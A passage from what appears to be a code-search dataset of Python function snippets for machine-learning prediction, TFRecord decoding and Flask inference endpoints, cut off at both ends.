version_name=version,\n batch_record=data\n )", "def predict(self, image_or_filename: Union[np.ndarray, str]) -> Tuple[str, float]:\n if isinstance(image_or_filename, str):\n image = util.load_image(image_or_filename)\n else:\n image = image_or_filename\n return self.model.predict(image, batch_size=8)\n # return self.model.predict_on_image(image)", "def predict(self, trained_model, prediction_datetime):\n return trained_model.predict()", "def _deserialize_single_field(\n example_data, tensor_info: feature_lib.TensorInfo\n):\n # Ragged tensor case:\n if tensor_info.sequence_rank > 1:\n example_data = _dict_to_ragged(example_data, tensor_info)\n\n # Restore shape if possible. TF Example flattened it.\n elif tensor_info.shape.count(None) < 2:\n shape = [-1 if i is None else i for i in tensor_info.shape]\n example_data = tf.reshape(example_data, shape)\n\n # Restore dtype\n if example_data.dtype != tensor_info.tf_dtype:\n example_data = tf.dtypes.cast(example_data, tensor_info.tf_dtype)\n return example_data", "def predict(net, input, fields):\n net.eval()\n example = torch_data.Example.fromlist(input, fields)\n dataset = torch_data.Dataset([example])\n iterator = torch_data.Iterator(dataset, batch_size=1)\n net_in = next(iter(iterator))\n return predict_batch(net, net_in)", "def predict_from_model(patch, model):\n\n prediction = model.predict(patch.reshape(1, 256, 256, 3))\n prediction = prediction[:, :, :, 1].reshape(256, 256)\n return prediction", "def predict(self, data):\n\n prediction = None\n if self.model is not None:\n prediction = self.model.predict(data)\n return prediction", "def decode_prediction(self, prediction):\n index = np.argmax(prediction)\n\n inv_map = {v: k for k, v in self.class_index.items()}\n label = inv_map[index]\n return label, np.amax(prediction)", "def load_predict_byname(filename, path=MODEL_PATH):\n full_path = os.path.join(path, filename)\n logging.info(\"trying to load {}\".format(full_path))\n return np.load(os.path.join(path, filename))['pred']", "def extract_pred_from_estimator_predictions(predictions):\n # print('predictions:', predictions)\n pred = np.array([])\n for prediction in predictions:\n pred = np.append(pred, prediction['predictions'])\n num_samples = len(pred)\n pred = pred.reshape((num_samples, ))\n return pred", "def tta_predict(learner, im_arr):\n # Note: we are not using the TTA method built into fastai because it only\n # works on image classification problems (and this is undocumented).\n # We should consider contributing this upstream to fastai.\n probs = []\n for k in range(8):\n trans_im = dihedral(Image(im_arr), k)\n o = learner.predict(trans_im)[2]\n # https://forums.fast.ai/t/how-best-to-have-get-preds-or-tta-apply-specified-transforms/40731/9\n o = Image(o)\n if k == 5:\n o = dihedral(o, 6)\n elif k == 6:\n o = dihedral(o, 5)\n else:\n o = dihedral(o, k)\n probs.append(o.data)\n\n label_arr = torch.stack(probs).mean(0).argmax(0).numpy()\n return label_arr", "def prediction(self, x):\n t = self.model.predict(x.reshape(1, -1))\n return t", "def _extract_prediction_tensors(model,\n create_input_dict_fn,\n ignore_groundtruth=False):\n input_dict = create_input_dict_fn()\n prefetch_queue = prefetcher.prefetch(input_dict, capacity=500)\n input_dict = prefetch_queue.dequeue()\n original_image = tf.expand_dims(input_dict[fields.InputDataFields.image], 0)\n preprocessed_image = model.preprocess(tf.to_float(original_image))\n prediction_dict = model.predict(preprocessed_image)\n detections = model.postprocess(prediction_dict)\n\n groundtruth = None\n if not ignore_groundtruth:\n groundtruth = {\n fields.InputDataFields.groundtruth_boxes:\n input_dict[fields.InputDataFields.groundtruth_boxes],\n fields.InputDataFields.groundtruth_classes:\n input_dict[fields.InputDataFields.groundtruth_classes],\n fields.InputDataFields.groundtruth_area:\n input_dict[fields.InputDataFields.groundtruth_area],\n fields.InputDataFields.groundtruth_is_crowd:\n input_dict[fields.InputDataFields.groundtruth_is_crowd],\n fields.InputDataFields.groundtruth_difficult:\n input_dict[fields.InputDataFields.groundtruth_difficult]\n }\n if fields.InputDataFields.groundtruth_group_of in input_dict:\n groundtruth[fields.InputDataFields.groundtruth_group_of] = (\n input_dict[fields.InputDataFields.groundtruth_group_of])\n if fields.DetectionResultFields.detection_masks in detections:\n groundtruth[fields.InputDataFields.groundtruth_instance_masks] = (\n input_dict[fields.InputDataFields.groundtruth_instance_masks])\n\n return eval_util.result_dict_for_single_example(\n original_image,\n input_dict[fields.InputDataFields.source_id],\n detections,\n groundtruth,\n class_agnostic=(\n fields.DetectionResultFields.detection_classes not in detections),\n scale_to_absolute=True)", "def predict(request):\n request_json = request.get_json()\n if request_json and 'review_body' in request_json:\n content = request_json['review_body'] # TODO add review_summary\n prediction = get_prediction(\n content, 'projects/207895552307/locations/us-central1/models/TCN5004391989450375168')\n classifications = []\n return MessageToJson(prediction)\n else:\n return f'ERROR: Missing review_body!'", "def predict(self, compound, spacegroup, T):\n\n prediction = self.model.predict(self._transform_input(compound,\n spacegroup, T))\n return float(prediction)", "def predict(self):\n path = self._artifact_repo.artifact_path(self._ARTIFACT_MODEL)\n model = tf.keras.models.load_model(path)\n\n _, _, x_test, y_test = self._load_data()\n x_test = tf.keras.utils.normalize(x_test, axis=1)\n\n preds = model.predict(x_test)\n self._show_cf_matrix(np.array([np.argmax(probas) for probas in preds]), y_test)", "def _get_prediction(self):\n raise NotImplementedError", "def read(self, field_name):\n field = self.mem_map.get_field(field_name)\n raw_data = self.reader(field.get_offset(), field.get_size())\n if raw_data:\n deps = field.get_deps()\n decoded_deps = {dep: self.read(dep) for dep in deps}\n return field.decode(raw_data, **decoded_deps)\n return None", "def get_field_from_dict(example_dict, field_name, height_m_agl=None):\n\n check_field_name(field_name)\n\n if field_name in ALL_SCALAR_PREDICTOR_NAMES:\n height_m_agl = None\n field_index = example_dict[SCALAR_PREDICTOR_NAMES_KEY].index(field_name)\n data_matrix = example_dict[SCALAR_PREDICTOR_VALS_KEY][..., field_index]\n elif field_name in ALL_SCALAR_TARGET_NAMES:\n height_m_agl = None\n field_index = example_dict[SCALAR_TARGET_NAMES_KEY].index(field_name)\n data_matrix = example_dict[SCALAR_TARGET_VALS_KEY][..., field_index]\n elif field_name in ALL_VECTOR_PREDICTOR_NAMES:\n field_index = example_dict[VECTOR_PREDICTOR_NAMES_KEY].index(field_name)\n data_matrix = example_dict[VECTOR_PREDICTOR_VALS_KEY][..., field_index]\n else:\n field_index = example_dict[VECTOR_TARGET_NAMES_KEY].index(field_name)\n data_matrix = example_dict[VECTOR_TARGET_VALS_KEY][..., field_index]\n\n if height_m_agl is None:\n return data_matrix\n\n height_index = match_heights(\n heights_m_agl=example_dict[HEIGHTS_KEY],\n desired_height_m_agl=height_m_agl\n )\n\n return data_matrix[..., height_index]", "def get_aux_fields(prediction_dict, example_dict):\n\n scalar_target_matrix = prediction_dict[prediction_io.SCALAR_TARGETS_KEY]\n scalar_prediction_matrix = (\n prediction_dict[prediction_io.SCALAR_PREDICTIONS_KEY]\n )\n\n num_examples = scalar_prediction_matrix.shape[0]\n num_ensemble_members = scalar_prediction_matrix.shape[-1]\n\n aux_target_matrix = numpy.full((num_examples, 0), numpy.nan)\n aux_prediction_matrix = numpy.full(\n (num_examples, 0, num_ensemble_members), numpy.nan\n )\n aux_target_field_names = []\n aux_predicted_field_names = []\n\n shortwave_surface_down_flux_index = -1\n shortwave_toa_up_flux_index = -1\n longwave_surface_down_flux_index = -1\n longwave_toa_up_flux_index = -1\n\n scalar_target_names = example_dict[example_utils.SCALAR_TARGET_NAMES_KEY]\n these_flux_names = [\n example_utils.SHORTWAVE_SURFACE_DOWN_FLUX_NAME,\n example_utils.SHORTWAVE_TOA_UP_FLUX_NAME\n ]\n\n if all([n in scalar_target_names for n in these_flux_names]):\n shortwave_surface_down_flux_index = scalar_target_names.index(\n example_utils.SHORTWAVE_SURFACE_DOWN_FLUX_NAME\n )\n shortwave_toa_up_flux_index = scalar_target_names.index(\n example_utils.SHORTWAVE_TOA_UP_FLUX_NAME\n )\n\n aux_target_field_names.append(SHORTWAVE_NET_FLUX_NAME)\n aux_predicted_field_names.append(SHORTWAVE_NET_FLUX_NAME)\n\n this_target_matrix = (\n scalar_target_matrix[:, [shortwave_surface_down_flux_index]] -\n scalar_target_matrix[:, [shortwave_toa_up_flux_index]]\n )\n aux_target_matrix = numpy.concatenate(\n (aux_target_matrix, this_target_matrix), axis=1\n )\n\n this_prediction_matrix = (\n scalar_prediction_matrix[:, [shortwave_surface_down_flux_index], :]\n - scalar_prediction_matrix[:, [shortwave_toa_up_flux_index], :]\n )\n aux_prediction_matrix = numpy.concatenate(\n (aux_prediction_matrix, this_prediction_matrix), axis=1\n )\n\n these_flux_names = [\n example_utils.LONGWAVE_SURFACE_DOWN_FLUX_NAME,\n example_utils.LONGWAVE_TOA_UP_FLUX_NAME\n ]\n\n if all([n in scalar_target_names for n in these_flux_names]):\n longwave_surface_down_flux_index = scalar_target_names.index(\n example_utils.LONGWAVE_SURFACE_DOWN_FLUX_NAME\n )\n longwave_toa_up_flux_index = scalar_target_names.index(\n example_utils.LONGWAVE_TOA_UP_FLUX_NAME\n )\n\n aux_target_field_names.append(LONGWAVE_NET_FLUX_NAME)\n aux_predicted_field_names.append(LONGWAVE_NET_FLUX_NAME)\n\n this_target_matrix = (\n scalar_target_matrix[:, [longwave_surface_down_flux_index]] -\n scalar_target_matrix[:, [longwave_toa_up_flux_index]]\n )\n aux_target_matrix = numpy.concatenate(\n (aux_target_matrix, this_target_matrix), axis=1\n )\n\n this_prediction_matrix = (\n scalar_prediction_matrix[:, [longwave_surface_down_flux_index], :] -\n scalar_prediction_matrix[:, [longwave_toa_up_flux_index], :]\n )\n aux_prediction_matrix = numpy.concatenate(\n (aux_prediction_matrix, this_prediction_matrix), axis=1\n )\n\n return {\n AUX_TARGET_NAMES_KEY: aux_target_field_names,\n AUX_PREDICTED_NAMES_KEY: aux_predicted_field_names,\n AUX_TARGET_VALS_KEY: aux_target_matrix,\n AUX_PREDICTED_VALS_KEY: aux_prediction_matrix,\n SHORTWAVE_SURFACE_DOWN_FLUX_INDEX_KEY:\n shortwave_surface_down_flux_index,\n SHORTWAVE_TOA_UP_FLUX_INDEX_KEY: shortwave_toa_up_flux_index,\n LONGWAVE_SURFACE_DOWN_FLUX_INDEX_KEY: longwave_surface_down_flux_index,\n LONGWAVE_TOA_UP_FLUX_INDEX_KEY: longwave_toa_up_flux_index\n }", "def make_tflite_inference(ndvi_img_array, model_interpreter):\n # Get input and output tensors.\n input_details = model_interpreter.get_input_details()\n output_details = model_interpreter.get_output_details()\n\n # Get Input shape\n input_shape = input_details[0]['shape']\n input_data = ndvi_img_array.reshape(input_shape)\n\n model_interpreter.set_tensor(input_details[0]['index'], input_data)\n model_interpreter.invoke()\n\n outputs = []\n\n for tensor in output_details:\n output_data = model_interpreter.get_tensor(tensor['index'])\n outputs.append(output_data[0][0])\n\n prediction = outputs[0]\n\n return prediction", "def predict_single(self, data, version='default'):\n return self.skil.api.transformincrementalarray(\n deployment_name=self.deployment.name,\n transform_name=self.model_name,\n version_name=version,\n single_record=data\n )", "def predict(self, dt=1):\n self.kf.predict()\n if self.time_since_update > 0: # there was missed detections\n self.continuing_hits = 0\n self.time_since_update += 1\n return self.kf.x[:self.dim_z].squeeze()", "def predict(self, data):\n\t\traise NotImplementedError", "def decode_tensorflow(self, encoded_chunks: tf.Tensor) -> tf.Tensor:", "def prediction(self, x):\n if len(x.shape)==1:\n x = np.reshape(x, (1, x.shape[0]))\n predict = self.model.predict(x)\n return predict", "def predict(self, img):\n return self._predict([img])[0]", "def predict(trained_model, X_test, y_test, image_name):\n if MODEL == 1:\n return predict_1(trained_model, X_test, y_test)\n elif MODEL == 3:\n if CROSS_VALIDATION:\n return cv_predict_3(trained_model, X_test, y_test)\n else:\n return predict_3(trained_model, X_test, y_test, image_name)\n elif MODEL == 2:\n return predict_2(trained_model, X_test, y_test)\n else:\n # For models 4, 5 and 6\n return predict_4(trained_model, X_test, y_test)", "def prediction(self, x):\n if len(x.shape)==1:\n x = np.reshape(x, (1, x.shape[0]))\n predict = self.model.predict(x)\n\n return predict", "def predict(self, data):\n return self.result.predict(data)", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n return example", "def get_prediction(\n image,\n detection_model,\n image_size: int = None,\n shift_amount: list = [0, 0],\n full_shape=None,\n postprocess: Optional[PostprocessPredictions] = None,\n verbose: int = 0,\n) -> PredictionResult:\n durations_in_seconds = dict()\n\n # read image as pil\n image_as_pil = read_image_as_pil(image)\n # get prediction\n time_start = time.time()\n detection_model.perform_inference(np.ascontiguousarray(image_as_pil), image_size=image_size)\n time_end = time.time() - time_start\n durations_in_seconds[\"prediction\"] = time_end\n\n # process prediction\n time_start = time.time()\n # works only with 1 batch\n detection_model.convert_original_predictions(\n shift_amount=shift_amount,\n full_shape=full_shape,\n )\n object_prediction_list: List[ObjectPrediction] = detection_model.object_prediction_list\n # filter out predictions with lower score\n filtered_object_prediction_list = [\n object_prediction\n for object_prediction in object_prediction_list\n if object_prediction.score.value > detection_model.confidence_threshold\n ]\n # postprocess matching predictions\n if postprocess is not None:\n filtered_object_prediction_list = postprocess(filtered_object_prediction_list)\n else:\n # init match merge instances\n postprocess = UnionMergePostprocess(match_threshold=0.9, match_metric=\"IOS\", class_agnostic=True)\n # postprocess matching predictions\n filtered_object_prediction_list = postprocess(filtered_object_prediction_list)\n\n time_end = time.time() - time_start\n durations_in_seconds[\"postprocess\"] = time_end\n\n if verbose == 1:\n print(\n \"Prediction performed in\",\n durations_in_seconds[\"prediction\"],\n \"seconds.\",\n )\n\n return PredictionResult(\n image=image, object_prediction_list=filtered_object_prediction_list, durations_in_seconds=durations_in_seconds\n )", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n print(name)\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example", "def predict(self, datafile):", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example", "def _decode_record(record,name_to_features):\n example = tf.parse_single_example(record,name_to_features)\n\n return example", "def predict():\n\tif request.method == \"POST\":\n\t\ttry:\n\t\t\t# read uplaoded audio file as bytes\n\t\t\tfile = request.files['file'].read()\n\t\t\t# get the audio signal as numpy array\n\t\t\tsignal = speech_recognizer.read_raw_audio(file)\n\t\t\t# convert audio isgnal to spectrogram using speech featurizer and expand tensor at 0th dimension\n\t\t\tsignal = speech_recognizer.model.speech_featurizer.tf_extract(tf.convert_to_tensor(signal, dtype=tf.float32))\n\t\t\tsignal = tf.expand_dims(signal, axis=0)\n\t\t\t# recognize for text sequence using greedy decoding\n\t\t\tpred = speech_recognizer.model.recognize(features=signal)\n\t\t\t# convert sequence to tamil unicode data\n\t\t\tpred = speech_recognizer.bytes_to_string(pred.numpy())[0]\n\t\t\t# retun the prediction to the user\n\t\t\treturn pred\n except Exception as e:\n\t\t\tprint(e)\n\t\t\tpass\n\telse:\n\t\treturn \"Error 404. Page Not Found!\"\n\nif __name__==\"__main__\":\n\tapp.run(host='0.0.0.0', port=5000, threaded=True, debug=True)", "def predict(self, review):\n raise NotImplementedError", "def predict(self, data, version='default'):\n if self.transform_service:\n data = self.transform_service.predict(data, version)\n return self.model_service.predict(data, version)", "def predict(self, data, only_lp=True):\n df = self.model.transpose(data)\n if only_lp:\n df = df.select(self.label_index_name, self.prediction_name, self.probability)\n return df", "def _read_and_decode(example_proto,data_shape,dtypes):\n features = {}\n for name in data_shape:\n features[name] = tf.FixedLenFeature([], tf.string)\n parsed_features = tf.parse_single_example(example_proto, features)\n count = 0\n res = {}\n for name in data_shape:\n res[name] = parsed_features[name]\n if dtypes[count]!=str:\n res[name]=tf.decode_raw(res[name],dtypes[count])\n if dtypes[count]==tf.float32 or dtypes[count]==tf.float64:\n res[name]=tf.convert_to_tensor(res[name],dtype=dtypes[count])\n if data_shape[name]:\n res[name]=tf.reshape(res[name],shape=data_shape[name])\n count += 1\n return res", "def _decode_record(record, name_to_features):\n\t\t\texample = tf.parse_single_example(record, name_to_features)\n\n\t\t\t# tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n\t\t\t# So cast all int64 to int32.\n\t\t\tfor name in list(example.keys()):\n\t\t\t\tt = example[name]\n\t\t\t\tif t.dtype == tf.int64:\n\t\t\t\t\tt = tf.to_int32(t)\n\t\t\t\texample[name] = t\n\n\t\t\treturn example", "def predict(self, data_X):\n a, r = self.particle_input.feed_forward(data_X)\n for layer in self.layers:\n a, r = layer.feed_forward(a, r)\n return a", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example", "def _unpredict(self, arr: np.ndarray) -> None:\n if self.Predictor.value == 2:\n imagecodecs.delta_decode(arr, out=arr, axis=-1)", "def _decode_record(record, name_to_features):\n example = tf.io.parse_single_example(serialized=record, features=name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.cast(t, dtype=tf.int32)\n example[name] = t\n\n return example", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example", "def predict():\n\n\n json_payload = request.json\n #LOG.info(f\"JSON payload: %s\" %json_payload)\n inference_payload = pd.DataFrame(json_payload)\n #LOG.info(\"inference payload DataFrame: %s\" %inference_payload)\n scaled_payload = scale(inference_payload)\n prediction = list(clf.predict(scaled_payload))\n return jsonify({'prediction': prediction})", "def predict(prediction_request):\n\n feature_type = prediction_request['feature_type']\n\n if feature_type not in [MFCC, C_CENS, C_CQT, C_STFT, MEL]:\n raise Exception('Invalid Feature type for prediction: {}'.format(feature_type))\n\n model = model_from_feature[feature_type]\n\n prediction = np.argmax(model.predict([np.reshape(prediction_request['content'], (1, *prediction_request['content'].shape, 1))]), axis=1)[0]\n\n predicted_class = \"COPD\" if prediction == 0 else \"non-COPD\"\n\n print(\"Prediction for type {} = {}\".format(feature_type, predicted_class))\n\n socket.send_pyobj({\n 'model': feature_type,\n 'class': predicted_class\n })", "def predict(self, data):\n\t\tres = self.neuralNetworks.inference(self.dataCenter.process_inference_data(data))\n\t\tprint(res)", "def _get_data_protobuf(self, filename):\n filename_queue = tf.train.string_input_producer([str(filename)],\n num_epochs=None)\n reader = tf.TFRecordReader()\n _, serialized_example = reader.read(filename_queue)\n features = self._get_features(serialized_example)\n\n # image\n with tf.name_scope(\"deserialise_image\"):\n image, image_height, image_width = self._image_from_features(features)\n\n # ground truth landmarks\n with tf.name_scope(\"deserialise_landmarks\"):\n gt_heatmaps, gt_lms, n_landmarks, visible, marked = self._heatmaps_from_features(features)\n\n # information\n with tf.name_scope(\"deserialise_info\"):\n scale = self._info_from_features(features)\n\n # augmentation\n with tf.name_scope(\"image_augmentation\"):\n if self.augmentation:\n gt_heatmaps, gt_lms, image, image_height, image_width = project.input.augmentation.augmentation(\n gt_heatmaps, gt_lms, image, image_height, image_width,\n max_scale=1.25, min_scale=0.75,\n max_rotate=30., min_rotate=-30.,\n flip_probability=0.5, flip_fn=self.flip_fn)\n\n with tf.name_scope(\"crop\"):\n # crop to 256 * 256\n gt_heatmaps, gt_lms, image = self._crop(gt_heatmaps, gt_lms, image, image_height, image_width)\n\n self._set_shape(image, gt_heatmaps, gt_lms)\n\n return image, gt_heatmaps, gt_lms, scale, marked", "def predict(self, frame: np.ndarray, bboxes: np.ndarray) -> \\\n Tuple[np.ndarray, np.ndarray, np.ndarray]:\n assert isinstance(frame, np.ndarray)\n assert isinstance(bboxes, np.ndarray)\n detected_bboxes = bboxes.copy()\n if bboxes.size != 0:\n return self.detector.predict(frame, detected_bboxes)\n keypoints = np.array([])\n keypoint_scores = np.array([])\n keypoint_conns = np.array([])\n\n return keypoints, keypoint_scores, keypoint_conns", "def _get_predictions(self, line: List[str]):\n example = self.tokenizer.encode_plus(\n [c for c in line],\n return_token_type_ids=True,\n return_attention_mask=True,\n return_tensors=\"pt\",\n )\n example = {k: v.to(self.device) for k, v in example.items()}\n prediction = self.model(example, training=False)[0]\n prediction = self.softmax_fn(prediction).cpu().data.numpy()\n prediction = prediction[1:-1, 1:].argmax(axis=-1)\n return prediction", "def predict_api():\n data = request.get_json()\n dataset = pd.DataFrame(data, index=[0, ])\n new_df = preprocess(dataset)\n\n print(type(new_df))\n if isinstance(new_df, str):\n\n return \"Error!\"\n else:\n\n result = predict(new_df)\n return jsonify(result)", "def predict(self, load_script=False, variant=\"predict\"):\n \n # Interpret the request data based on the expected row and column structure\n row_template = ['strData', 'strData']\n col_headers = ['model_name', 'n_features']\n feature_col_num = 1\n \n # An additional key field column is expected if the call is made through the load script\n if load_script:\n row_template = ['strData', 'strData', 'strData']\n col_headers = ['model_name', 'key', 'n_features']\n feature_col_num = 2\n \n # Create a Pandas Data Frame for the request data\n self.request_df = utils.request_df(self.request, row_template, col_headers)\n \n # Initialize the persistent model\n self.model = PersistentModel()\n \n # Get the model name from the request dataframe\n self.model.name = self.request_df.loc[0, 'model_name']\n \n # Get the model from cache or disk\n self._get_model()\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(3)\n \n if load_script:\n # Set the key column as the index\n self.request_df.set_index(\"key\", drop=False, inplace=True)\n \n try:\n # Split the features provided as a string into individual columns\n self.X = pd.DataFrame([x[feature_col_num].split(\"|\") for x in self.request_df.values.tolist()],\\\n columns=self.model.features_df.loc[:,\"name\"].tolist(),\\\n index=self.request_df.index)\n except AssertionError as ae:\n err = \"The number of input columns do not match feature definitions. Ensure you are using the | delimiter and that the target is not included in your input to the prediction function.\"\n raise AssertionError(err) from ae\n \n # Convert the data types based on feature definitions \n self.X = utils.convert_types(self.X, self.model.features_df, sort=False)\n\n if variant in ('predict_proba', 'predict_log_proba'):\n # If probabilities need to be returned\n if variant == 'predict_proba':\n # Get the predicted probability for each sample \n self.y = self.model.pipe.predict_proba(self.X)\n elif variant == 'predict_log_proba':\n # Get the log probability for each sample\n self.y = self.model.pipe.predict_log_proba(self.X)\n \n # Prepare a list of probability by class for each sample\n probabilities = []\n\n for a in self.y:\n s = \"\"\n i = 0\n for b in a:\n s = s + \", {0}: {1:.3f}\".format(self.model.pipe.named_steps['estimator'].classes_[i], b)\n i = i + 1\n probabilities.append(s[2:])\n \n self.y = probabilities\n \n else:\n # Predict y for X using the previously fit pipeline\n self.y = self.model.pipe.predict(self.X)\n\n # Inverse transformations on the targets if required\n if self.model.scale_target or self.model.make_stationary:\n # Apply the transformer to the test targets\n self.y = self.model.target_transformer.inverse_transform(self.y) \n\n # Prepare the response\n self.response = pd.DataFrame(self.y, columns=[\"result\"], index=self.X.index)\n \n if load_script:\n # Add the key field column to the response\n self.response = self.request_df.join(self.response).drop(['n_features'], axis=1)\n \n # If the function was called through the load script we return a Data Frame\n self._send_table_description(\"predict\")\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(4)\n \n return self.response\n \n # If the function was called through a chart expression we return a Series\n else:\n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(4)\n \n return self.response.loc[:,'result']", "def predict_image(img_tensor: torch.Tensor) -> Tuple[str, str]:\n surface_pred, smoothness_pred = MODEL(img_tensor)\n\n surface_id = surface_pred.argmax(axis=1).item()\n smoothness_id = smoothness_pred.argmax(axis=1).item()\n\n surface_string = StreetImageDataset.get_surface_by_id(surface_id)\n smoothness_string = StreetImageDataset.get_smoothness_by_id(smoothness_id)\n\n return smoothness_string, surface_string", "def predict_single_fold(self, model: TorchBasedLinearEstimator, dataset: TabularDataset) -> np.ndarray:\n pred = model.predict(dataset.data)\n\n return pred", "def _build_predictor(self):\n try: \n predict_fn = tf.contrib.predictor.from_saved_model(self.saved_path)\n except OSError as err: \n print(f\"OSError: {err}\")\n self._predict_fn = predict_fn", "def predict(self,text):\n\n text= \"[CLS] \" + text + \" [SEP]\"\n tokenized_text = self.tokenizer.tokenize(text)\n indexed_tokens = self.tokenizer.convert_tokens_to_ids(tokenized_text)\n masked_index = tokenized_text.index('[MASK]') \n\n # Create the segments tensors.\n segments_ids = [0] * len(tokenized_text)\n \n # Convert inputs to PyTorch tensors\n tokens_tensor = torch.tensor([indexed_tokens])\n segments_tensors = torch.tensor([segments_ids])\n \n self.model.eval()\n \n # Predict all tokens\n with torch.no_grad():\n predictions = self.model(tokens_tensor, segments_tensors)\n \n predicted_index = torch.argmax(predictions[0][0][masked_index]).item()\n predicted_token = self.tokenizer.convert_ids_to_tokens([predicted_index])[0]\n \n print(predicted_token)", "def _parse(serialized_example):\n\n feature_map = {\n 'dayofweek': tf.io.FixedLenFeature([], tf.int64),\n 'dropofflat': tf.io.FixedLenFeature([], tf.float32),\n 'dropofflon': tf.io.FixedLenFeature([], tf.float32),\n 'fare_amount': tf.io.FixedLenFeature([], tf.float32),\n 'hourofday': tf.io.FixedLenFeature([], tf.int64),\n 'passengers': tf.io.FixedLenFeature([], tf.float32),\n 'pickuplat': tf.io.FixedLenFeature([], tf.float32),\n 'pickuplon': tf.io.FixedLenFeature([], tf.float32)\n }\n\n # Parse the serialized data into a dictionary.\n parsed_example = tf.io.parse_single_example(\n serialized=serialized_example,\n features=feature_map)\n\n features = add_engineered(parsed_example)\n label = features.pop(\"fare_amount\")\n\n return features, label", "def read_model_and_predict(text):\n try:\n global loaded_model\n new_positive_tweets = pd.Series(text)\n tc = text_count.TextCount()\n ct = clean_text.CleanText()\n df_counts_pos = tc.transform(new_positive_tweets)\n df_clean_pos = ct.transform(new_positive_tweets)\n df_model_pos = df_counts_pos\n df_model_pos['clean_text'] = df_clean_pos\n print(\"Predicting from the loaded pickled model...\")\n return loaded_model.predict(df_model_pos).tolist()\n except RuntimeError as e:\n pass\n finally:\n #################################################################\n # This statement required to try using less memory while running#\n #################################################################\n del loaded_model", "def _decode_record(record, name_to_features):\n example = tf.parse_single_example(record, name_to_features)\n\n # tf.Example only supports tf.int64, but the TPU only supports tf.int32.\n # So cast all int64 to int32.\n for name in list(example.keys()):\n t = example[name]\n if t.dtype == tf.int64:\n t = tf.to_int32(t)\n example[name] = t\n\n return example[\"src_ids\"].values, example[\"tgt_ids\"].values, example[\"label\"][0]", "def predict(self, image_array):\n probabilities = self.model.predict(image_array, verbose=0)\n prediction = int(np.argmax(probabilities))\n return {'prediction': prediction, 'probabilities': probabilities.tolist()[0]}", "def prediction(self, x):\n t = self.model.predict(x)\n return t", "def predict(self, to_predict):\n\t\treturn self.model.predict(to_predict)", "def prediction_prob(self):\n return self.a[np.arange(self.a.shape[0]), self.prediction]", "def process_prediction():\n try:\n input = np.array(request.json, dtype=np.float32)\n prediction = predictor.predict(input).numpy().tolist()\n return jsonify(result=prediction, status=\"Prediction succeeded\")\n except Exception as err:\n return jsonify(result=None, status=f\"Prediction failed: {err}\")", "def extract_predictions(dataset):\n return dataset.Prediction.apply(lambda x: -1 if x == 'b' else 1)", "def prediction():\n # retweets_only = request.args.get('retweets_only')\n # api.set_retweet_checking(strtobool(retweets_only.lower()))\n # with_sentiment = request.args.get('with_sentiment')\n # api.set_with_sentiment(strtobool(with_sentiment.lower()))\n # query = request.args.get('query')\n # api.set_query(query)\n\n # tweets = api.get_tweets()\n perdiction = api.get_perdiction()\n\n return perdiction", "def predict_single(self, data, version='default'):\n if self.transform_service:\n data = self.transform_service.predict_single(data, version)\n return self.model_service.predict_single(data, version)", "def predict(self, image):\n\n if self.__preprocess != None:\n image = self.__preprocess(image)\n\n result = self.__model.predict(image)\n\n if self.__postprocess != None:\n result = self.__postprocess(result)\n\n return result", "def predict(self, input):\n self._check_predict_ready()\n with torch.no_grad():\n self.eval()\n input = deep_to(input, self.device)\n prediction = self.nn_module(input)\n prediction = self.prediction_transform(prediction)\n return prediction", "def deserialize_inference_result(results_b64):\n bytes_io = io.BytesIO(base64.b64decode(results_b64))\n single_pred_dict = dict(np.load(bytes_io))\n if len(single_pred_dict) != 1:\n raise ValueError('Expected exactly one object in the structured np array. '\n f'Saw {len(single_pred_dict)}')\n sequence_name = list(single_pred_dict.keys())[0]\n activations = list(single_pred_dict.values())[0]\n return sequence_name, activations", "def predict(model, img, target_size=(229, 229)): #fixed size for InceptionV3 architecture\r\n if img.size != target_size:\r\n img = img.resize(target_size)\r\n\r\n x = image.img_to_array(img)\r\n x = np.expand_dims(x, axis=0)\r\n x = preprocess_input(x)\r\n preds = model.predict(x)\r\n return preds[0]", "def get_prediction(engineered_set, data):\n clf = 